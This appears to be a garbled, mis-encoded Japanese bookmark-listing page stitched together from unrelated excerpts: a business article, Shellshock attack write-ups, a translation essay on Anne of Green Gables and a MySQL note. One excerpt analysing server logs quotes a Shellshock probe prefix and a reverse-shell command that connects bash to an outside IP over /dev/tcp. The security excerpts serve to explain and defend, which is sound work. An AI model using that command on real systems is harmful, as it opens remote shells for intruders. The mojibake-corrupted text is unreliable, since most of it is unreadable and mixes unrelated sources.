スタãƒã‚„ディズニーãªã©ã€å„ªã‚ŒãŸä¼šç¤¾ã«å…±é€šã—ã¦ã„ã‚‹ã“ã¨ã€€ã€Œå…±é€šè¨€èªžã€ãŒãªã„ã®ã¯å±é™ºï¼Ÿå¼·ã„組織を作るãƒã‚¤ãƒ³ãƒˆ
ãƒã‚°ãƒŸãƒ¼Biz
スタãƒã‚„ディズニーãªã©ã€å„ªã‚ŒãŸä¼šç¤¾ã«å…±é€šã—ã¦ã„ã‚‹ã“ã¨ã€€ã€Œå…±é€šè¨€èªžã€ãŒãªã„ã®ã¯å±é™ºï¼Ÿå¼·ã„組織を作るãƒã‚¤ãƒ³ãƒˆ
ファイアウォール内ã®ã‚µãƒ¼ãƒã«å¯¾ã™ã‚‹Shellshockを利用ã—ãŸæ”»æ’ƒ - 葉ã£ã±æ—¥è¨˜
2014-09-27: 該当サイト上ã«XSSãŒãªãã¦ã‚‚攻撃å¯èƒ½ã§ã‚ã‚‹ã“ã¨ãŒ id:mayuki ã•ã‚“ã®ã‚³ãƒ¡ãƒ³ãƒˆã§åˆ¤æ˜Žã—ã¾ã—ãŸã®ã§å…¨é¢çš„ã«æ›¸ãç›´ã—ã¾ã—ãŸã€‚ファイアウォール内ã§ã‚ã£ã¦ã‚‚攻撃者ã¯ãƒ•ã‚¡ã‚¤ã‚¢ã‚¦ã‚©ãƒ¼ãƒ«å†…ã®Shellshock攻撃ãŒé€šç”¨ã™ã‚‹CGIã®URLãŒã‚ã‹ã£ã¦ã„ã‚‹ã ã‘ã§æ”»æ’ƒå¯èƒ½ã§ã™ã®ã§æ—©æ€¥ã«å¯¾å¿œãŒå¿…è¦ã§ã™ï¼ä¼šç¤¾ã®ãƒ–ãƒã‚°ã«ã‚‚書ã„ã¦ã¾ã™ãŒã€ãƒ•ã‚¡ã‚¤ã‚¢ã‚¦ã‚©ãƒ¼ãƒ«å†…ã«ç½®ã„ã¦ã‚るサーãƒã§æ”»æ’ƒè€…ãŒç›´æŽ¥ã‚¢ã‚¯ã‚»ã‚¹ã§ããªã„ã‹ã‚‰ã¨ã„ã£ã¦bashã®æ›´æ–°ã‚’æ€ ã£ã¦ã„ã‚‹ã¨ã€æ¡ä»¶ã«ã‚ˆã£ã¦ã¯æ”»æ’ƒãŒå¯èƒ½ã¨ãªã‚Šã¾ã™ã€‚ æ¡ä»¶ã¨ã—ã¦ã¯ã€ ãã®ã‚µãƒ¼ãƒã«ã¯ã‚·ã‚§ãƒ«ã‚’経由ã—ã¦å¤–部コマンドを起動ã™ã‚‹CGIç‰ãŒå‹•ã„ã¦ã„ã‚‹(通常ã®Shellshockã®æ”»æ’ƒã¨åŒæ¡ä»¶) 攻撃者ãŒãã®URLを事å‰ã«çŸ¥ã£ã¦ã„ã‚‹(ã‚ã‚‹ã„ã¯æŽ¨æ¸¬å¯èƒ½) ã¨ãªã‚Šã¾ã™ã€‚ 攻撃者ã¯ã€ãƒ¦ãƒ¼ã‚¶ãƒ¼ã‚’ç½ URLã¸èª˜å°Žã—ã€ä»¥ä¸‹ã®ã‚ˆã†ãªJavaScriptã‚’ç½ ãƒšãƒ¼ã‚¸ä¸Šã§å‹•ã‹ã—ã€æ”»æ’ƒå¯¾è±¡ã®W
ウェブアプリã«ãŠã‘ã‚‹Bash脆弱性ã®å³æ»æ¡ä»¶ #ShellShock - ã‚ã‚‚ãŠãã°
æ¡ä»¶1. /bin/shã®å®Ÿä½“ãŒbashã®ãƒ‡ã‚£ã‚¹ãƒˆãƒªãƒ“ューション RHEL CentOS Scientific Linux Fedora Amazon Linux openSUSE Arch Linux (自らè¨å®šã—ãŸå ´åˆ: Debian, Ubuntu) æ¡ä»¶2. 動作環境 CGI (レンタルサーãƒã§ã‚ã‚ŠãŒã¡ãªCGIモードã®PHPç‰ã‚‚å«ã‚€) Passenger(Ruby) æ¡ä»¶3. プãƒã‚°ãƒ©ãƒ 内容 Passengerã¯å…¨æ»äº¡ *1 systemã‚„ `command`〠'| /usr/lib/sendmail' ãªã©ã§å¤–部コマンド実行 *2 PHPã®mailã‚„mb_send_mailã€ãã®ä»–フレームワークç‰ã‚’介ã—ãŸãƒ¡ãƒ¼ãƒ«é€ä¿¡ *3 以下ã¯æ¡ä»¶1ãŒä¸è¦ 明示的ã«bashを呼㶠先é 㧠#!/bin/bash ã‚„ #!/usr/bin/env bash ã—ã¦ã„るプãƒã‚°ãƒ©ãƒ を実行 (rbenv
/dev/tcpã«ã‚ˆã‚‹bashã®ã‚½ã‚±ãƒƒãƒˆé€šä¿¡
件ã®bashã®è„†å¼±æ€§ãŒæ®‹ã£ã¦ã„ã‚‹ã“ã¨ã‚’期待ã—ãŸã‚¢ã‚¯ã‚»ã‚¹ã«ã¤ã„ã¦ã€24時間ã»ã©å‰ã«ã¯æ¥ã¦ãªã‹ã£ãŸã‚“ã§ã™ãŒã€ã•ãã»ã©ãƒã‚°ã‚’見ã¦ã¿ãŸã‚‰ã¡ã‚‡ã£ã¨ã ã‘æ¥ã¦ã¾ã—ãŸã€‚ ãƒã‚°ã«æ®‹ã‚‹ã®ã¯ User-Agent ãらã„ãªã®ã§ã™ãŒã€ã»ã‹ã®ãƒ•ã‚£ãƒ¼ãƒ«ãƒ‰ã§è©¦ã—ã¦ã„る輩もã„ã‚‹ã“ã¨ã§ã—ょã†ã€‚ アクセス元を逆引ãã—ã¦ã¿ãŸã‚“ã§ã™ãŒã€ã‚¯ãƒ©ã‚¦ãƒ‰ã‚µãƒ¼ãƒ“スã°ã£ã‹ã‚Šã§ã—ãŸï¼ˆä¸€å€‹ã ã‘ shodan.io ãªã‚‹ãƒ‰ãƒ¡ã‚¤ãƒ³ã®ä¸‹ã®IPアドレスã‹ã‚‰ã‚ã£ãŸã®ã ã‘ã©ã€ãªã‚“ã ã‚ã†â€¦â€¦ï¼‰ã€‚ ã•ã¦ã€() { :;}; ã®å¾Œã«ãªã«ã‚’ã‚„ã£ã¦ã‚‹ã®ã‹ã€ã¨ã„ã†ã®ãªã‚“ã§ã™ãŒã€ä¸€ã¤ THIS IS VULNERABLE 㨠echo ã™ã‚‹ã ã‘ã¨ã„ã†äººãŒã„ã¾ã—ãŸã€‚è¦å‘Šã®ã¤ã‚‚ã‚Šãªã®ã‹ã€æ‰‹å‹•ã§ä½•ã‹ç¢ºèªã—ã¦ã„ã‚‹ã®ã‹ãªã€‚ã‚ã¨ã¯pingã ãªâ€¦â€¦ã¨æ€ã£ã¦ãŸã‚“ã§ã™ãŒã€ã¡ã‚‡ã£ã¨ç‰¹ç•°ãªã‚‚ã®ãŒã€‚ /bin/bash -i > /dev/tcp/198.206.15.239/8081 0>&1
本日最終回「花åã¨ã‚¢ãƒ³ã€æ‘岡花åã¯ãªãœã€Žèµ¤æ¯›ã®ã‚¢ãƒ³ã€ã®é‡è¦å ´é¢ã‚’翻訳ã—ãªã‹ã£ãŸã®ã‹ - エã‚サイトニュース
ã‚¢ãƒã‚‚ã˜ã‚ƒã®ç¤¾é•·ã•ã‚“ã®ãŠã‹ã’ã§ã€Žèµ¤æ¯›ã®ã‚¢ãƒ³ã€ãŒå‡ºç‰ˆã•ã‚Œã‚‹ã“ã¨ã«ãªã‚Šå¤§å›£å††ã®ã€ŽèŠ±åã¨ã‚¢ãƒ³ã€ã€‚ 実ã¯ã€æ‘岡花åã®è¨³ã—ãŸã€Žèµ¤æ¯›ã®ã‚¢ãƒ³ã€ã«ã¯ã€å¤§ããªè¬ŽãŒã‚る。 第37ç« ã€æœ€å¾Œã‹ã‚‰ã²ã¨ã¤å‰ã®ç« 。 マシュウãŒå¿ƒè‡“発作ã§æ»ã‚“ã§ã—ã¾ã†ã€‚ ãã®æ™©ã€æ®‹ã•ã‚ŒãŸãƒžãƒªãƒ©ã¯ã‚¢ãƒ³ã«ã€ã„ã‹ã«è‡ªåˆ†ãŒã‚¢ãƒ³ã‚’æ„›ã—ã¦ã„ã‚‹ã‹ã‚’語る。 ã“ã®ã‚·ãƒ¼ãƒ³ã‚’ã€æ‘岡花åã¯è¨³ã—ã¦ã„ãªã„ã®ã 。 æ‘岡花å訳『赤毛ã®ã‚¢ãƒ³ã€ã§ã¯ã€ã“ã†ãªã£ã¦ã„る。 “ãã®å£°ã‚’èžãã¤ã‘ãŸãƒžãƒªãƒ©ãŒéƒ¨å±‹ã«ã¯ã„ã£ã¦ããŸã€‚二人ã¯ã¨ã‚‚ã«æ³£ãã€å¿ƒã‹ã‚‰èªžã‚Šã‚ã„ã€æ…°ã‚ã‚ã£ãŸã€‚ 二日ãŸã£ã¦ã‹ã‚‰ã€ãƒžã‚·ãƒ¥ã‚¦ãƒ»ã‚¯ã‚¹ãƒãƒ¼ãƒˆã¯å½¼ãŒè€•ã—ãŸç•‘ã‚„ãŸã„ã›ã¤ã«è‚²ã¦ãŸæžœæ¨¹åœ’を通ã£ã¦é‹ã°ã‚Œã¦ã„ã£ãŸã€‚†(赤毛ã®ã‚¢ãƒ³ã€æ‘岡花å訳・新潮文庫・æ˜å’Œå…å一年四月三å日七å四刷P376) ã“ã®éƒ¨åˆ†ã€åŽŸæ–‡ã§ã¯ã“ã†ã§ã‚る。 Marilla heard her and crept in to comfort her. "There
MySQL 5.7.5ã§å®Ÿè£…ã•ã‚ŒãŸ オンラインã§ã®InnoDBãƒãƒƒãƒ•ã‚¡ãƒ—ールサイズ変更(サイズ拡大編)
MySQL 5.7.5ã®æ–°æ©Ÿèƒ½ã€‚ ãƒã‚°è²¼ã£ã¦ãŸã‚‰é•·ããªã£ãŸã®ã§ã€ãƒãƒƒãƒ•ã‚¡ãƒ—ールサイズをå°ã•ãã™ã‚‹ã®ã¯åˆ¥ã‚¨ãƒ³ãƒˆãƒªãƒ¼ã¸ã€‚ ç†å±ˆçš„ã«ã¯ã€ - ãƒãƒƒãƒ•ã‚¡ãƒ—ールを大ããã™ã‚‹ã¨ã * innodb_buffer_pool_chunk_size ã”ã¨ã«æ–°ã—ã„ページを確ä¿ã—ãªãŒã‚‰ã‚´ãƒ‹ãƒ§ã‚´ãƒ‹ãƒ§ã‚„ã‚‹ * ã“ã®å‡¦ç†ä¸ã¯ *ãƒãƒƒãƒ•ã‚¡ãƒ—ールã¸ã®å…¨ã¦ã®ã‚¢ã‚¯ã‚»ã‚¹ãŒãƒ–ãƒãƒƒã‚¯ã•ã‚Œã‚‹ã‚ˆ* - ãƒãƒƒãƒ•ã‚¡ãƒ—ールをå°ã•ãã™ã‚‹ã¨ã * innodb_buffer_pool_chunk_size ã”ã¨ã«ãƒšãƒ¼ã‚¸ã‚’追ã„出ã—ãªãŒã‚‰ã‚´ãƒ‹ãƒ§ã‚´ãƒ‹ãƒ§ã‚„ã‚‹ らã—ã„。 http://dev.mysql.com/doc/refman/5.7/en/innodb-buffer-pool-online-resize.html ã—ã‹ã—ãƒãƒƒãƒ•ã‚¡ãƒ—ール大ããã™ã‚‹æ™‚ã®å‹•ä½œã¯InnoDBã®ãƒˆãƒ©ãƒ•ã‚£ãƒƒã‚¯å…¨æ»…ã§ã™ã‹ä½¿ãˆNEEEE ã¨ã‹ã€ã€Œã‚ªãƒ³ãƒ©ã‚¤ãƒ³ã§ãƒãƒƒãƒ•ã‚¡ãƒ—ールサイズを
ランã‚ング
ランã‚ング
ランã‚ング
リリースã€éšœå®³æƒ…å ±ãªã©ã®ã‚µãƒ¼ãƒ“スã®ãŠçŸ¥ã‚‰ã›
最新ã®äººæ°—エントリーã®é…ä¿¡
j次ã®ãƒ–ックマーク
kå‰ã®ãƒ–ックマーク
lã‚ã¨ã§èªã‚€
eコメント一覧を開ã
oページを開ã
{{#tags}}- {{label}}
{{/tags}}